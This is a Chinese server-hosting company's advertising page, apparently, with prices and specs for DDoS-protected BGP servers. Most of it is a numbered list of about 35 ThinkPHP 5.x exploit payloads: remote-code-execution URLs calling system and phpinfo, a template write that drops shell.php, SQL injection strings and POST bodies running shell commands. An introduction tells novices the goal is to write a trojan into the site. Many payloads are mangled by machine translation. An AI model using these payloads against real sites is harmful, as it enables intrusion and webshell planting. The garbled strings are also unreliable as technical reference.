晴空网络活动服务器

江苏BGP100G

899元 /月

  • 配置 16H/16G/240G ssd/1T HDD
  • 带宽 30M独享(G口)
  • 防御 单机100G
  • 测试IP 43.248.189.3
  • 应用 游戏、网站、视频、直播、区块链
7*24H咨询服务更多江苏宿迁高防BGP多线产品>>

江苏电信百兆

1199元 /月

  • 配置 16H/16G/240G ssd/1T HDD
  • 带宽 100M独享(G口)
  • 防御 单机100G
  • 测试IP 222.187.222.1
  • 应用 游戏、网站、视频、直播、区块链
7*24H咨询服务更多江苏宿迁高防BGP多线产品>>

枣庄高防BGP

868元 /月

  • 配置 16H/16G/120G ssd/500G HDD
  • 带宽 30M独享(G口)
  • 防御 单机100G
  • 测试IP 43.249.192.1
  • 应用 游戏、网站、视频、直播、区块链
7*24H咨询服务更多浙江杭州高防BGP产品>>

活动展示

我们坚持为您提供全心全意的idc运维服务,不断追求让更优质的产品满足您的需求

  • 今天晴空网络(www.idcsky.cn)分享几个thinkPHP5.0和5.1的漏洞汇总,希望对您的网站安全有帮助。

    新手看过来:


    网站版本+你的域名+路径 就是漏洞利用地址,

    111123.png

     url就是网站,剩下的目录,最终目的 调取phpinfo 写入木马


    上面解释为新手准备,老师傅们就可以直接跳过了!

    thinkphp-RCE-POC

    官方公告:
    1,https ://blog.thinkphp.cn/869075
    2,https ://blog.thinkphp.cn/910675

    POC:

    thinkphp 5.0.22
    1,http://192.168.1.1/thinkphp/public/?s=
    .| think\config/get&name= database.username 2,http://192.168.1.1/thinkphp/public/?s=.|think\config /get&name=database.password
    3,http://url/to/thinkphp_5.0.22/?s = index / \ think \ app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = id
    4,http:/ /url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

    thinkphp 5
    5,http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

    thinkphp 5.0.21
    6,http://localhost/thinkphp_5.0.21/?s = index / \ think \ app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = id
    7,http://localhost/thinkphp_5.0.21/? s = index / \ think \ app / invokefunction&function = call_user_func_array&vars [0] = phpinfo&vars [1] [] = 1

    thinkphp 5.1。*
    8,http://url/to/thinkphp5.1.29/?s = index / \ think \ Request / input&filter = phpinfo&data = 1
    9,http://url/to/thinkphp5.1.29/?s = index / \ think \ Request / input&filter = system&data = cmd
    10,http://url/to/thinkphp5.1.29/?s = index / \ think \ template \ driver \ file / write&cacheFile = shell.php&content =%3C?php%20phpinfo() ;?%3E
    11,http://url/to/thinkphp5.1.29/?s = index / \ think \ view \ driver \ Php / display&content =%3C?php%20phpinfo();%3E
    12,http: //url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    13,http://url/to/thinkphp5.1.29/? s = index / \ think \ app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = cmd
    14,http://url/to/thinkphp5.1.29/?s = index / \ think \ Container / invokefunction&function = call_user_func_array&vars [0] = phpinfo&vars [1] [] = 1
    15,http://url/to/thinkphp5.1.29 /?s = index / \ think \ Container / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = cmd

    未知版本
    16,?s = index / \ think \ module / action / param1 / $ {@ phpinfo()}
    17,?s = index / \ think \ Module / Action / Param / $ {@ phpinfo()}
    18,?s = index / \ think / module / aciton / param1 / $ {@ print(THINK_VERSION)}
    19,index.php?s = / home / article / view_recent / name / 1'
    标头=“ X-Forwarded-For:1' )和extractvalue(1,concat(0x5c,(select md5(233))))#“
    20,index.php?s = / home / shopcart / getPricetotal / tag / 1%27
    21,index.php?s = / home / shopcart / getpriceNum / id / 1%27
    22,index.php?s = / home / user / cut / id / 1%27
    23,index.php?s = / home / service / index / id / 1% 27
    24,index.php?s = / home / pay / chongzhi / orderid / 1%27
    25,index.php?s = / home / pay / index / orderid / 1%27
    26,index.php?s = / home / order / complete / id / 1%27
    27,index.php?s = / home / order / complete / id / 1%27
    28,index.php?s = / home / order / detail / id / 1%27
    29,index.php?s = / home / order / cancel / id / 1%27
    30,index.php?s = / home / pay / index / orderid / 1%27)%20UNION%20ALL%20SELECT%20md5(233)-+
    31,POST /index.php?s=/home/user/checkcode/ HTTP / 1.1
    内容处置:表格-数据; name =“ couponid”
    1')联合选择sleep('''+ str(sleep_time)+''')#

    thinkphp 5.0.23(完整版)调试模式
    32,(post)public / index.php(data)_method = __ construct&filter [] = system&server [REQUEST_METHOD] = touch%20 / tmp / xxx

    thinkphp 5.0.23(完整版)
    33,(发布)public / index.php?s = captcha(数据)_method = __ construct&filter [] = system&method = get&server [REQUEST_METHOD] = ls -al

    thinkphp 5.0.10(完整版)
    34,(post)public / index.php?s = index / index / index(data)s = whoami&_method = __ construct&method&filter [] = system

    thinkphp 5.1。*和5.2。*和5.0。*
    35,(post)public / index.php(data)c = exec&f = calc.exe&_method = filter

    感谢您对晴空网络(www.idcsky.cn)的信任,未来我们将提供更多更好的服务给您。晴空网络(晴空科技)专注高防BGP,大带宽服务器,我们的机房有宿迁BGP机房,盐城大带宽机房,杭州高防BGP机房,台州高防BGP机房,福建福州高防机房等经营权,7*24H售后无忧,满足各种客户需求。欢迎咨询选购哦!

服务热线

18800602682

功能和特性

价格和优惠

获取内部资料

微信服务号